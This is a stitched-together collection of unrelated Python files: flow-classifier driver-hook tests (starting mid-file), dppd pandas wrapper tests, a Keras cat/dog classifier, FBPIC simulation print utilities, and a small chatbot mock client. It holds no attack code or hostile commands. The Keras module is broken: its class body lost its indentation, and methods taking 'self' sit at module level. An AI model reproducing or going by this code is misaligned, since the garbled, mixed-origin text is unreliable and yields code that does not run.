            side_effect=self._record_context_postcommit)
        with self.port(
            name='test1'
        ) as port:
            with self.flow_classifier(flow_classifier={
                'logical_source_port': port['port']['id']
            }) as fc:
                driver_manager = self.fake_driver_manager
                (driver_manager.create_flow_classifier_precommit
                 .assert_called_once_with(mock.ANY))
                (driver_manager.create_flow_classifier_postcommit
                 .assert_called_once_with(mock.ANY))
                self.assertIsInstance(
                    self.plugin_context_precommit,
                    fc_ctx.FlowClassifierContext)
                self.assertIsInstance(
                    self.plugin_context_postcommit,
                    fc_ctx.FlowClassifierContext)
                self.assertIn('flow_classifier', fc)
                self.assertEqual(
                    self.plugin_context_precommit.current,
                    fc['flow_classifier'])
                self.assertEqual(
                    self.plugin_context_postcommit.current,
                    fc['flow_classifier'])

    def test_create_flow_classifier_postcommit_driver_manager_exception(self):
        """Postcommit failure must roll back by deleting the classifier."""
        self.fake_driver_manager.create_flow_classifier_postcommit = mock.Mock(
            side_effect=fc_exc.FlowClassifierDriverError(
                method='create_flow_classifier_postcommit'
            )
        )
        with self.port(
            name='test1'
        ) as port:
            self._create_flow_classifier(
                self.fmt, {'logical_source_port': port['port']['id']},
                expected_res_status=500)
            driver_manager = self.fake_driver_manager
            (driver_manager.create_flow_classifier_precommit
             .assert_called_once_with(mock.ANY))
            (driver_manager.create_flow_classifier_postcommit
             .assert_called_once_with(mock.ANY))
            # Rollback path: all three delete hooks fire.
            (driver_manager.delete_flow_classifier
             .assert_called_once_with(mock.ANY))
            (driver_manager.delete_flow_classifier_precommit
             .assert_called_once_with(mock.ANY))
            (driver_manager.delete_flow_classifier_postcommit
             .assert_called_once_with(mock.ANY))
            self._test_list_resources('flow_classifier', [])

    def test_create_flow_classifier_precommit_driver_manager_exception(self):
        """Precommit failure must abort before anything is committed."""
        self.fake_driver_manager.create_flow_classifier_precommit = mock.Mock(
            side_effect=fc_exc.FlowClassifierDriverError(
                method='create_flow_classifier_precommit'
            )
        )
        with self.port(
            name='test1'
        ) as port:
            self._test_list_resources('flow_classifier', [])
            self._create_flow_classifier(
                self.fmt, {'logical_source_port': port['port']['id']},
                expected_res_status=500)
            self._test_list_resources('flow_classifier', [])
            driver_manager = self.fake_driver_manager
            (driver_manager.create_flow_classifier_precommit
             .assert_called_once_with(mock.ANY))
            # Nothing was committed, so no postcommit and no delete hooks.
            (driver_manager.create_flow_classifier_postcommit
             .assert_not_called())
            driver_manager.delete_flow_classifier.assert_not_called()
            (driver_manager.delete_flow_classifier_precommit
             .assert_not_called())
            (driver_manager.delete_flow_classifier_postcommit
             .assert_not_called())
            self._test_list_resources('flow_classifier', [])

    def test_update_flow_classifier_driver_manager_called(self):
        """Update must pass both current and original to the hooks."""
        self.fake_driver_manager.update_flow_classifier_precommit = mock.Mock(
            side_effect=self._record_context_precommit)
        self.fake_driver_manager.update_flow_classifier_postcommit = mock.Mock(
            side_effect=self._record_context_postcommit)
        with self.port(
            name='test1'
        ) as port:
            with self.flow_classifier(flow_classifier={
                'name': 'test1',
                'logical_source_port': port['port']['id']
            }) as fc:
                req = self.new_update_request(
                    'flow_classifiers', {'flow_classifier': {'name': 'test2'}},
                    fc['flow_classifier']['id']
                )
                res = self.deserialize(
                    self.fmt,
                    req.get_response(self.ext_api)
                )
                driver_manager = self.fake_driver_manager
                (driver_manager.update_flow_classifier_precommit
                 .assert_called_once_with(mock.ANY))
                (driver_manager.update_flow_classifier_postcommit
                 .assert_called_once_with(mock.ANY))
                self.assertIsInstance(
                    self.plugin_context_precommit,
                    fc_ctx.FlowClassifierContext)
                self.assertIsInstance(self.plugin_context_postcommit,
                                      fc_ctx.FlowClassifierContext)
                self.assertIn('flow_classifier', fc)
                self.assertIn('flow_classifier', res)
                self.assertEqual(self.plugin_context_precommit.current,
                                 res['flow_classifier'])
                self.assertEqual(self.plugin_context_postcommit.current,
                                 res['flow_classifier'])
                self.assertEqual(self.plugin_context_precommit.original,
                                 fc['flow_classifier'])
                self.assertEqual(self.plugin_context_postcommit.original,
                                 fc['flow_classifier'])

    def _test_update_flow_classifier_driver_manager_exception(self, updated):
        """Shared body for the update-failure tests.

        `updated` says whether the DB update is expected to have been
        committed before the driver raised (postcommit failure) or not
        (precommit failure).
        """
        with self.port(
            name='test1'
        ) as port:
            with self.flow_classifier(flow_classifier={
                'name': 'test1',
                'logical_source_port': port['port']['id']
            }) as fc:
                self.assertIn('flow_classifier', fc)
                original_flow_classifier = fc['flow_classifier']
                req = self.new_update_request(
                    'flow_classifiers', {'flow_classifier': {'name': 'test2'}},
                    fc['flow_classifier']['id']
                )
                updated_flow_classifier = copy.copy(original_flow_classifier)
                if updated:
                    updated_flow_classifier['name'] = 'test2'
                res = req.get_response(self.ext_api)
                self.assertEqual(500, res.status_int)
                driver_manager = self.fake_driver_manager
                (driver_manager.update_flow_classifier_precommit
                 .assert_called_once_with(mock.ANY))
                if updated:
                    (driver_manager.update_flow_classifier_postcommit
                     .assert_called_once_with(mock.ANY))
                else:
                    (driver_manager.update_flow_classifier_postcommit
                     .assert_not_called())
                res = self._list('flow_classifiers')
                self.assertIn('flow_classifiers', res)
                # Py3 fix: assertItemsEqual existed only in Python 2's
                # unittest; assertCountEqual is its Python 3 name.
                self.assertCountEqual(
                    res['flow_classifiers'], [updated_flow_classifier])

    def test_update_flow_classifier_precommit_driver_manager_exception(self):
        self.fake_driver_manager.update_flow_classifier_precommit = mock.Mock(
            side_effect=fc_exc.FlowClassifierDriverError(
                method='update_flow_classifier_precommit'
            )
        )
        self._test_update_flow_classifier_driver_manager_exception(False)

    def test_update_flow_classifier_postcommit_driver_manager_exception(self):
        self.fake_driver_manager.update_flow_classifier_postcommit = mock.Mock(
            side_effect=fc_exc.FlowClassifierDriverError(
                method='update_flow_classifier_postcommit'
            )
        )
        self._test_update_flow_classifier_driver_manager_exception(True)

    def test_delete_flow_classifer_driver_manager_called(self):
        """Delete must invoke the delete hooks with the deleted classifier."""
        self.fake_driver_manager.delete_flow_classifier = mock.Mock(
            side_effect=self._record_context)
        self.fake_driver_manager.delete_flow_classifier_precommit = mock.Mock(
            side_effect=self._record_context_precommit)
        self.fake_driver_manager.delete_flow_classifier_postcommit = mock.Mock(
            side_effect=self._record_context_postcommit)
        with self.port(
            name='test1'
        ) as port:
            with self.flow_classifier(
                flow_classifier={'logical_source_port': port['port']['id']},
                do_delete=False
            ) as fc:
                req = self.new_delete_request(
                    'flow_classifiers', fc['flow_classifier']['id']
                )
                res = req.get_response(self.ext_api)
                self.assertEqual(204, res.status_int)
                driver_manager = self.fake_driver_manager
                (driver_manager.delete_flow_classifier
                 .assert_called_once_with(mock.ANY))
                (driver_manager.delete_flow_classifier_precommit
                 .assert_called_once_with(mock.ANY))
                (driver_manager.delete_flow_classifier_postcommit
                 .assert_called_once_with(mock.ANY))
                self.assertIsInstance(
                    self.plugin_context, fc_ctx.FlowClassifierContext
                )
                self.assertIsInstance(
                    self.plugin_context_precommit, fc_ctx.FlowClassifierContext
                )
                self.assertIsInstance(self.plugin_context_postcommit,
                                      fc_ctx.FlowClassifierContext)
                self.assertIn('flow_classifier', fc)
                self.assertEqual(
                    self.plugin_context.current, fc['flow_classifier'])
                self.assertEqual(self.plugin_context_precommit.current,
                                 fc['flow_classifier'])
                self.assertEqual(self.plugin_context_postcommit.current,
                                 fc['flow_classifier'])

    def _test_delete_flow_classifier_driver_manager_exception(self):
        """Shared body: a failing delete hook must leave the row in place."""
        with self.port(
            name='test1'
        ) as port:
            with self.flow_classifier(flow_classifier={
                'name': 'test1',
                'logical_source_port': port['port']['id']
            }, do_delete=False) as fc:
                req = self.new_delete_request(
                    'flow_classifiers', fc['flow_classifier']['id']
                )
                res = req.get_response(self.ext_api)
                self.assertEqual(500, res.status_int)
                driver_manager = self.fake_driver_manager
                driver_manager.delete_flow_classifier.assert_called_once_with(
                    mock.ANY
                )
                self._test_list_resources('flow_classifier', [fc])

    def test_delete_flow_classifier_driver_manager_exception(self):
        self.fake_driver_manager.delete_flow_classifier = mock.Mock(
            side_effect=fc_exc.FlowClassifierDriverError(
                method='delete_flow_classifier'
            )
        )
        self._test_delete_flow_classifier_driver_manager_exception()

    def test_delete_flow_classifier_precommit_driver_manager_exception(self):
        self.fake_driver_manager.delete_flow_classifier_precommit = mock.Mock(
            side_effect=fc_exc.FlowClassifierDriverError(
                method='delete_flow_classifier_precommit'
            )
        )
        self._test_delete_flow_classifier_driver_manager_exception()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from dppd import dppd
import pandas as pd
import pandas.testing
from plotnine.data import mtcars
__author__ = "Florian Finkernagel"
__copyright__ = "Florian Finkernagel"
__license__ = "mit"
# Short aliases for the pandas testing helpers used throughout this module.
assert_series_equal = pandas.testing.assert_series_equal
assert_frame_equal = pandas.testing.assert_frame_equal
# Module-level dppd handle: dp(...) wraps a DataFrame, X refers to the
# DataFrame currently inside the pipeline.
dp, X = dppd()
def test_iloc():
    """Positional slicing through dp(...).iloc matches plain pandas."""
    frame = pd.DataFrame(
        {"a": list(range(10)), "bb": list(range(10)), "ccc": list(range(10))}
    )
    expected = frame.iloc[:3]
    observed = dp(frame).iloc[:3].pd
    assert_frame_equal(expected, observed)
def test_loc():
    """Label lookup with a list through dp(...).loc matches plain pandas."""
    frame = pd.DataFrame(
        {"a": list(range(10)), "bb": list(range(10)), "ccc": list(range(10))}
    ).set_index("a")
    expected = frame.loc[[3]]
    observed = dp(frame).loc[[3]].pd
    assert_frame_equal(expected, observed)
def test_loc_str():
    """Label lookup with string index labels matches plain pandas."""
    frame = pd.DataFrame(
        {
            "a": [str(n) for n in range(10)],
            "bb": list(range(10)),
            "ccc": list(range(10)),
        }
    ).set_index("a")
    expected = frame.loc[["3"]]
    observed = dp(frame).loc[["3"]].pd
    assert_frame_equal(expected, observed)
def test_loc_returning_series():
    """Scalar-label .loc yields a Series, matching plain pandas."""
    frame = pd.DataFrame(
        {"a": list(range(10)), "bb": list(range(10)), "ccc": list(range(10))}
    ).set_index("a")
    expected = frame.loc[3]
    observed = dp(frame).loc[3].pd
    assert_series_equal(expected, observed)
def test_at():
    """dp(...).at returns the scalar cell value directly."""
    frame = pd.DataFrame(
        {
            "a": [str(n) for n in range(10)],
            "bb": list(range(10)),
            "ccc": list(range(10)),
        }
    ).set_index("a")
    assert dp(frame).at["3", "bb"] == 3
def test_iat():
    """dp(...).iat returns the scalar at a positional location."""
    frame = pd.DataFrame(
        {
            "a": [str(n) for n in range(10)],
            "bb": list(range(10)),
            "ccc": list(range(10, 20)),
        }
    ).set_index("a")
    # Row 3, column 0 ("bb", since "a" became the index) -> 3.
    assert dp(frame).iat[3, 0] == 3
def test_sample():
    """Sampling with a fixed random_state is reproducible through dppd."""
    frame = pd.DataFrame(
        {"a": list(range(10)), "bb": list(range(10)), "ccc": list(range(10))}
    ).set_index("a")
    expected = frame.sample(3, random_state=3)
    observed = dp(frame).sample(3, random_state=3).pd
    assert_frame_equal(expected, observed)
def test_index():
    """.index unwraps to the real pandas Index, not a dppd proxy."""
    import dppd.base
    frame = pd.DataFrame(
        {
            "a": [str(n) for n in range(10)],
            "bb": list(range(10)),
            "ccc": list(range(10)),
        }
    ).set_index("a")
    idx = dp(frame).index
    assert (idx == frame.index).all()
    assert not isinstance(idx, dppd.base.DPPDAwareProxy)
def test_sort_values():
    """Descending sort_values through dppd matches plain pandas."""
    frame = pd.DataFrame(
        {
            "a": [str(n) for n in range(10)],
            "bb": list(range(10)),
            "ccc": list(range(10)),
        }
    ).set_index("a")
    expected = frame.sort_values("bb", ascending=False)
    observed = dp(frame).sort_values("bb", ascending=False).pd
    assert_frame_equal(expected, observed)
def test_assign():
    """assign() with an X-expression matches pandas assign on the column."""
    frame = pd.DataFrame(
        {
            "a": [str(n) for n in range(10)],
            "bb": list(range(10)),
            "ccc": list(range(10)),
        }
    ).set_index("a")
    expected = frame.assign(d=frame["ccc"] * 2)
    observed = dp(frame).assign(d=X["ccc"] * 2).pd
    assert_frame_equal(expected, observed)
def test_assign_in_order():
    """Dependent assignments within one mutate() call work.

    Pandas only supports referring to a just-assigned column inside the
    same .assign call from 0.23 onward, so the check is skipped on older
    versions.
    """
    # Fix: compare numeric (major, minor) instead of raw strings —
    # lexicographic comparison is wrong, e.g. "0.9.0" > "0.22.0".
    major, minor = pd.__version__.split(".")[:2]
    if (int(major), int(minor)) >= (0, 23):
        df = pd.DataFrame(
            {"a": [str(x) for x in (range(10))], "bb": 10, "ccc": list(range(20, 30))}
        ).set_index("a")
        should = df.assign(d=list(range(30, 40)))
        should = should.assign(d2=lambda x: x["d"] + 2)
        actual = dp(df).mutate(d=X["ccc"] + X["bb"], d2=lambda x: x["d"] + 2).pd
        assert_frame_equal(should, actual)
def test_rename():
    """Column renames applied in the pipeline are visible in the result."""
    frame = pd.DataFrame(
        {"a": [str(n) for n in range(10)], "bb": 10, "ccc": list(range(20, 30))}
    )
    with dppd(frame) as (ndf, X):
        ndf.rename(columns={"a": "a2", "bb": "ccc", "ccc": "c2"})
    assert (X.columns == ["a2", "ccc", "c2"]).all()
def test_dataframe_subscript():
    """Subscripting a dppd proxy with a column name yields that column."""
    with dppd(mtcars) as (dp, X):
        actual = dp.head(5)["name"].pd
        should = mtcars["name"].head(5)
        assert_series_equal(actual, should)
|
import tensorflow as tf
from numpy import pi
from keras.backend import sigmoid
from keras.models import Sequential, load_model
from keras.layers import Layer, InputLayer, Dense, Flatten, Activation, Conv2D, MaxPooling2D, LeakyReLU
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.optimizers import Adam
from keras.backend import get_session
from keras.utils.generic_utils import get_custom_objects
import os
from glob import glob
class Model:
def __init__(self,
input_shape=(224, 224, 3),
num_classes=2,
checkpoint_path="./checkpoint",
batch_size=32,
epochs=10,
learning_rate=0.001):
"""
input_shape - In HWC format
"""
self.model = Sequential()
self.input_shape = input_shape
self.num_classes = num_classes
self.checkpoint_path = checkpoint_path
self.batch_size = batch_size
self.learning_rate = learning_rate
self.epochs = epochs
get_custom_objects().update({'gelu_activation': Activation(self.gelu_activation)})
def build_model(self):
self.model.add(InputLayer(input_shape=self.input_shape))
self.model.add(Conv2D(32, kernel_size=(3, 3), activation='linear',
input_shape=self.input_shape, padding='same'))
self.model.add(Activation('relu'))
self.model.add(MaxPooling2D((2, 2), padding='same'))
self.model.add(Conv2D(64, (3, 3), activation='linear', padding='same'))
self.model.add(Activation('relu'))
self.model.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
self.model.add(
Conv2D(128, (3, 3), activation='linear', padding='same'))
self.model.add(Activation('relu'))
self.model.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
self.model.add(Flatten())
self.model.add(Dense(128, activation="linear"))
self.model.add(Activation('gelu_activation', name='GeluActivation'))
self.model.add(Dense(self.num_classes, activation='softmax'))
opt = Adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999, amsgrad=False)
self.model.compile(optimizer=opt,
loss='binary_crossentropy',
metrics=['accuracy'])
print("Model built and compiled successfully")
@staticmethod
def gelu_activation(_input, alpha=1):
return 0.5 * _input * (alpha + tf.tanh(tf.sqrt(2 / pi) * (_input + 0.044715 * _input * _input * _input)))
def train_model(self, train_data_gen, valid_data_gen):
checkpoint_dir = os.path.dirname(self.checkpoint_path)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
tensorboard_dir = os.path.join(checkpoint_dir, 'tensorboard')
if not os.path.exists(tensorboard_dir):
os.makedirs(tensorboard_dir)
# Create a callback that saves the model's weights
cp_callback = ModelCheckpoint(filepath=self.checkpoint_path, save_weights_only=True, verbose=1, period=1)
# cp_callback = ModelCheckpoint(filepath=self.checkpoint_path, monitor='val_acc', verbose=1,
# save_best_only=True, mode='max')
tb_callback = TensorBoard(log_dir=tensorboard_dir, histogram_freq=0, write_graph=True, write_images=False)
self.model.fit_generator(
train_data_gen,
steps_per_epoch=train_data_gen.samples // self.batch_size,
epochs=self.epochs,
validation_data=valid_data_gen,
validation_steps=valid_data_gen.samples // self.batch_size,
callbacks=[cp_callback, tb_callback])
def convert_checkpoint(self, final_checkpoint):
    """Convert a Keras .h5 weights checkpoint into a TF1 session checkpoint.

    Loads the weights into the live model, then saves the session variables
    to ``<checkpoint_dir>/tf_ckpt/final_model.ckpt``.

    Parameters
    ----------
    final_checkpoint : str
        Path to the Keras ``.h5`` weights file to convert.
    """
    checkpoint_dir = os.path.dirname(final_checkpoint)
    # (fix: removed unused local `basename` that was computed but never read)
    save_path = os.path.join(checkpoint_dir, "tf_ckpt", "final_model.ckpt")
    # Add ops to save and restore all the variables.
    saver = tf.train.Saver()
    self.model.load_weights(final_checkpoint)
    sess = get_session()
    saver.save(sess, save_path)
def save_frozen(self, frozen_filename):
    """Freeze the current model graph (variables -> constants) and write it to disk.

    Parameters
    ----------
    frozen_filename : str
        Destination path for the serialized frozen GraphDef (binary protobuf).
    """
    # First freeze the graph and remove training nodes.
    # The single output op name is taken from the Keras model's output tensor.
    output_names = self.model.output.op.name
    sess = get_session()
    frozen_graph = tf.graph_util.convert_variables_to_constants(sess, sess.graph.as_graph_def(), [output_names])
    frozen_graph = tf.graph_util.remove_training_nodes(frozen_graph)
    # Save the model
    with open(frozen_filename, "wb") as ofile:
        ofile.write(frozen_graph.SerializeToString())
def prediction(self, test_data_path):
    """Run the model over every .jpg under *test_data_path* and print a Cat/Dog label."""
    from PIL import Image
    import numpy as np
    for image_path in glob(os.path.join(test_data_path, "*.jpg")):
        # Resize to the model's spatial input size and scale pixels to [0, 1].
        frame = Image.open(image_path).resize(self.input_shape[:2])
        batch = np.expand_dims(np.array(frame), axis=0) / 255.0
        scores = self.model.predict(batch, batch_size=1)
        print(scores)
        # Class 1 = Dog, class 0 = Cat.
        if np.argmax(scores):
            print("{} : Prediction - Dog".format(os.path.basename(image_path)))
        else:
            print("{} : Prediction - Cat".format(os.path.basename(image_path)))
def test_case():
    """Smoke test: return True when the model graph builds and compiles cleanly."""
    try:
        Model().build_model()
    except Exception as exc:
        print(exc)
        return False
    return True
def test_case2():
    """Build the model and convert a fixed .h5 checkpoint to TF checkpoint format."""
    final_checkpoint = ("/home/codesteller/workspace/ml_workspace/trt-custom-plugin/saved_model/"
                        "checkpoints/saved_model-0001.h5")
    cnn = Model(input_shape=(150, 150, 3))
    cnn.build_model()
    cnn.convert_checkpoint(final_checkpoint)
    print("done")
def test_case3():
    """Load trained weights and run inference over the bundled test images."""
    final_checkpoint = ("/home/codesteller/workspace/ml_workspace/trt_ws/trt-custom-plugin/saved_model/"
                        "checkpoints/saved_model-0005.h5")
    test_data = "../test_data"
    cnn_model = Model(input_shape=(150, 150, 3))
    cnn_model.build_model()
    cnn_model.model.load_weights(final_checkpoint)
    # cnn_model.convert_checkpoint(final_checkpoint)
    cnn_model.prediction(test_data)
# Script entry point: runs the inference smoke test; the other cases are kept
# disabled for manual use.
if __name__ == "__main__":
    # if test_case():
    #     print("Test Case Passed")
    # else:
    #     print("Test Case Passed")
    #
    # test_case2()
    test_case3()
|
# Copyright 2016, FBPIC contributors
# Authors: Remi Lehe, Manuel Kirchen, Kevin Peters, Soeren Jalas
# License: 3-Clause-BSD-LBNL
"""
Fourier-Bessel Particle-In-Cell (FB-PIC) main file
It defines a set of generic functions for printing simulation information.
"""
import sys, time
from fbpic import __version__
from fbpic.utils.mpi import MPI, mpi_installed, gpudirect_enabled
from fbpic.utils.cuda import cuda, cuda_installed, get_uuid
# OutOfMemoryError only exists when cupy/CUDA is present, so import it lazily.
if cuda_installed:
    from cupy.cuda.memory import OutOfMemoryError
# Check if terminal is correctly set to UTF-8 and set progress character;
# fall back to a plain dash when the full-block glyph cannot be rendered.
if sys.stdout.encoding == 'UTF-8':
    progress_char = u'\u2588'
else:
    progress_char = '-'
class ProgressBar(object):
    """
    ProgressBar class that keeps track of the time spent by the algorithm.
    It handles the calculation and printing of the progress bar and a
    summary of the total runtime.
    """

    def __init__(self, N, n_avg=20, Nbars=35, char=progress_char):
        """
        Initializes a timer / progression bar.
        Timing is done with respect to the absolute time at initialization.

        Parameters
        ----------
        N: int
            The total number of iterations performed by the step loop

        n_avg: int, optional
            The amount of recent timesteps used to calculate the average
            time taken by a step

        Nbars: int, optional
            The number of bars printed for the progression bar
            (fix: was documented as "Nbar", which does not match the
            actual parameter name)

        char: str, optional
            The character used to show the progression.
        """
        self.N = N
        self.n_avg = n_avg
        self.Nbars = Nbars
        self.bar_char = char
        # Initialize variables to measure the time taken by the simulation
        self.i_step = 0
        self.start_time = time.time()
        self.prev_time = self.start_time
        self.total_duration = 0.
        self.time_per_step = 0.
        self.avg_time_per_step = 0.
        self.eta = None

    def time( self, i_step ):
        """
        Calculates the time taken by the last iterations, the average time
        taken by the most recent iterations and the estimated remaining
        simulation time.

        Parameters
        ----------
        i_step : int
            The current iteration of the loop
        """
        # Register current step
        self.i_step = i_step
        # Calculate time taken by last step
        # (the method name does not shadow the `time` module here: inside the
        # body, `time` resolves to the module-level import)
        curr_time = time.time()
        self.total_duration = curr_time - self.start_time
        self.time_per_step = curr_time - self.prev_time
        # Estimate average time per step: exponential moving average with
        # effective window n_avg
        self.avg_time_per_step += \
            (self.time_per_step - self.avg_time_per_step)/self.n_avg
        if self.i_step <= 2:
            # Ignores first step in time estimation (compilation time)
            self.avg_time_per_step = self.time_per_step
        # Estimated time in seconds until it will finish
        if self.i_step < self.n_avg:
            # Not enough samples yet for a meaningful estimate
            self.eta = None
        else:
            self.eta = self.avg_time_per_step*(self.N-self.i_step)
        # Advance the previous time to the current time
        self.prev_time = curr_time

    def print_progress( self ):
        """
        Prints a progression bar with the estimated
        remaining simulation time and the time taken by the last step.
        """
        i = self.i_step
        # Print progress bar
        if i == 0:
            # Let the user know that the first step is much longer
            sys.stdout.write('\r' + \
                'Just-In-Time compilation (up to one minute) ...')
            sys.stdout.flush()
        else:
            # Print the progression bar
            nbars = int( (i+1)*1./self.N*self.Nbars )
            sys.stdout.write('\r|' + nbars*self.bar_char )
            sys.stdout.write((self.Nbars-nbars)*' ')
            sys.stdout.write('| %d/%d' %(i+1,self.N))
            if self.eta is None:
                # Time estimation is only printed after n_avg timesteps
                sys.stdout.write(', calc. ETA...')
            else:
                # Conversion to H:M:S
                m, s = divmod(self.eta, 60)
                h, m = divmod(m, 60)
                sys.stdout.write(', %d:%02d:%02d left' % (h, m, s))
            # Time taken by the last step
            sys.stdout.write(', %d ms/step' %(self.time_per_step*1.e3))
            sys.stdout.flush()
            # Clear rest of the terminal line (ANSI escape)
            sys.stdout.write('\033[K')

    def print_summary( self ):
        """
        Print a summary about the total runtime of the simulation.
        The average below includes the (slow) first compiled step.
        """
        avg_tps = (self.total_duration / self.N)*1.e3
        m, s = divmod(self.total_duration, 60)
        h, m = divmod(m, 60)
        print('\nTotal time taken (with compilation): %d:%02d:%02d' %(h, m, s))
        print('Average time per iteration ' \
              '(with compilation): %d ms\n' %(avg_tps))
# -----------------------------------------------------
# Print utilities
# -----------------------------------------------------
def print_simulation_setup( sim, verbose_level=1 ):
    """
    Print information about the simulation.
    - Version of FBPIC
    - CPU or GPU computation
    - Number of parallel MPI domains
    - Number of threads in case of CPU multi-threading
    - (Additional detailed information)

    Parameters
    ----------
    sim: an fbpic Simulation object
        Contains all the information of the simulation setup

    verbose_level: int, optional
        Level of detail of the simulation information
        0 - Print no information
        1 (Default) - Print basic information
        2 - Print detailed information
    """
    if verbose_level > 0:
        # Print version of FBPIC
        message = '\nFBPIC (%s)\n'%__version__
        # Basic information
        if verbose_level == 1:
            # Print information about computational setup
            if sim.use_cuda:
                message += "\nRunning on GPU "
            else:
                message += "\nRunning on CPU "
            if sim.comm.size > 1:
                message += "with %d MPI processes " %sim.comm.size
            if sim.use_threading and not sim.use_cuda:
                message += "(%d threads per process) " %sim.cpu_threads
        # Detailed information
        elif verbose_level == 2:
            # Information on MPI
            if mpi_installed:
                message += '\nMPI available: Yes'
                message += '\nMPI processes used: %d' %sim.comm.size
                message += '\nMPI Library Information: \n%s' \
                    %MPI.Get_library_version()
            else:
                message += '\nMPI available: No'
            # Information on Cuda
            if cuda_installed:
                message += '\nCUDA available: Yes'
            else:
                message += '\nCUDA available: No'
            # Information about the architecture and the node used
            if sim.use_cuda:
                message += '\nCompute architecture: GPU (CUDA)'
                if mpi_installed:
                    if gpudirect_enabled:
                        message += '\nCUDA GPUDirect (MPI) enabled: Yes'
                    else:
                        message += '\nCUDA GPUDirect (MPI) enabled: No'
                node_message = get_gpu_message()
            else:
                message += '\nCompute architecture: CPU'
                if sim.use_threading:
                    message += '\nCPU multi-threading enabled: Yes'
                    message += '\nThreads: %s' %sim.cpu_threads
                else:
                    message += '\nCPU multi-threading enabled: No'
                if sim.fld.trans[0].fft.use_mkl:
                    message += '\nFFT library: MKL'
                else:
                    message += '\nFFT library: pyFFTW'
                node_message = get_cpu_message()
            # Gather the information about where each node runs
            # (every rank contributes its node string; rank 0 concatenates)
            if sim.comm.size > 1:
                node_messages = sim.comm.mpi_comm.gather( node_message )
                if sim.comm.rank == 0:
                    node_message = ''.join( node_messages )
            message += node_message
            message += '\n'
            # Information on the numerical algorithm
            if sim.fld.n_order == -1:
                # n_order == -1 is the sentinel for an infinite-order stencil
                message += '\nPSATD stencil order: infinite'
            else:
                message += '\nPSATD stencil order: %d' %sim.fld.n_order
            message += '\nParticle shape: %s' %sim.particle_shape
            message += '\nLongitudinal boundaries: %s' %sim.comm.boundaries['z']
            message += '\nTransverse boundaries: %s' %sim.comm.boundaries['r']
            message += '\nGuard region size: %d ' %sim.comm.n_guard+'cells'
            message += '\nDamping region size: %d ' %sim.comm.nz_damp+'cells'
            message += '\nInjection region size: %d ' %sim.comm.n_inject+'cells'
            message += '\nParticle exchange period: every %d ' \
                %sim.comm.exchange_period + 'step'
            if sim.boost is not None:
                message += '\nBoosted frame: Yes'
                message += '\nBoosted frame gamma: %d' %sim.boost.gamma0
                if sim.use_galilean:
                    message += '\nGalilean frame: Yes'
                else:
                    message += '\nGalilean frame: No'
            else:
                message += '\nBoosted frame: False'
        message += '\n'
        # Only processor 0 prints the message:
        if sim.comm.rank == 0:
            print( message )
def print_available_gpus():
    """
    Lists all available CUDA GPUs.

    ``cuda.detect()`` prints the device list directly to stdout;
    nothing is returned.
    """
    cuda.detect()
def get_gpu_message():
    """
    Returns a string with information about the currently selected GPU,
    including (when available) the MPI rank, node name and GPU UUID.
    """
    gpu = cuda.gpus.current
    # Convert bytestring to actual string (older drivers return bytes,
    # newer ones may already return str — hence the AttributeError fallback)
    try:
        gpu_name = gpu.name.decode()
    except AttributeError:
        gpu_name = gpu.name
    # Print the GPU that is being used
    if MPI.COMM_WORLD.size > 1:
        rank = MPI.COMM_WORLD.rank
        node = MPI.Get_processor_name()
        message = "\nMPI rank %d selected a %s GPU with id %s on node %s" %(
            rank, gpu_name, gpu.id, node)
    else:
        message = "\nFBPIC selected a %s GPU with id %s" %( gpu_name, gpu.id )
        if mpi_installed:
            node = MPI.Get_processor_name()
            message += " on node %s" %node
    # Print the GPU UUID, if available
    uuid = get_uuid(gpu.id)
    if uuid is not None:
        message += "\n(GPU UUID: %s)" % uuid
    return(message)
def get_cpu_message():
    """
    Returns a string with information about the node of each MPI rank
    (an empty string for single-process runs).
    """
    # Nothing to report outside of multi-process runs.
    if MPI.COMM_WORLD.size <= 1:
        return ""
    return "\nMPI rank %d runs on node %s" % (
        MPI.COMM_WORLD.rank, MPI.Get_processor_name())
def print_gpu_meminfo_all():
    """
    Prints memory information about every available CUDA GPU,
    one line per device.
    """
    for device in cuda.gpus.lst:
        print_gpu_meminfo(device)
def print_gpu_meminfo(gpu):
    """
    Prints memory information about the GPU.

    Parameters :
    ------------
    gpu : object
        A numba cuda gpu context object.
    """
    with gpu:
        # get_memory_info() returns (free_bytes, total_bytes)
        meminfo = cuda.current_context().get_memory_info()
        # NOTE: the backslash continues the string literal itself — the output
        # stays on a single line.
        print("GPU: %s, free: %s Mbytes, total: %s Mbytes \
" % (gpu, meminfo[0]*1e-6, meminfo[1]*1e-6))
def catch_gpu_memory_error( f ):
    """
    Decorator that calls the function `f` and catches any GPU memory
    error, during the execution of f.

    If a memory error occurs, this decorator prints a corresponding message
    and aborts the simulation (using MPI abort if needed)
    """
    from functools import wraps

    # Redefine the original function by calling it within a try/except.
    # (fix: preserve the wrapped function's __name__/__doc__ with
    # functools.wraps — previously every wrapped function reported as "g")
    @wraps(f)
    def g(*args, **kwargs):
        try:
            return f(*args, **kwargs)
        except OutOfMemoryError as e:
            handle_cuda_memory_error( e, f.__name__ )
    # Decorator: return the new function
    return g
def handle_cuda_memory_error( exception, function_name ):
    """
    Print a message indicating which GPU went out of memory,
    and abort the simulation (using MPI Abort if needed).

    Parameters
    ----------
    exception : BaseException
        The caught out-of-memory error (re-raised in single-process runs)
    function_name : str
        Name of the fbpic function in which the error occurred
    """
    # Print a useful message
    message = '\nERROR: GPU reached OUT_OF_MEMORY'
    if MPI.COMM_WORLD.size > 1:
        message += ' on MPI rank %d' %MPI.COMM_WORLD.rank
    # (fix: corrected user-facing typo "occured" -> "occurred")
    message += '\n(Error occurred in fbpic function `%s`)\n' %function_name
    sys.stdout.write(message)
    sys.stdout.flush()
    # Abort the simulation: MPI.Abort kills all ranks; otherwise re-raise
    if MPI.COMM_WORLD.size > 1:
        MPI.COMM_WORLD.Abort()
    else:
        raise exception
|
import unittest.mock
from programy.clients.config import ClientConfigurationData
from programy.clients.events.client import EventBotClient
from programytest.clients.arguments import MockArgumentParser
class MockEventBotClient(EventBotClient):
    """Minimal concrete EventBotClient used to instantiate the abstract base in tests."""

    def __init__(self, id, argument_parser=None):
        super(MockEventBotClient, self).__init__(id, argument_parser)

    def get_client_configuration(self):
        return ClientConfigurationData("events")

    def load_license_keys(self):
        pass
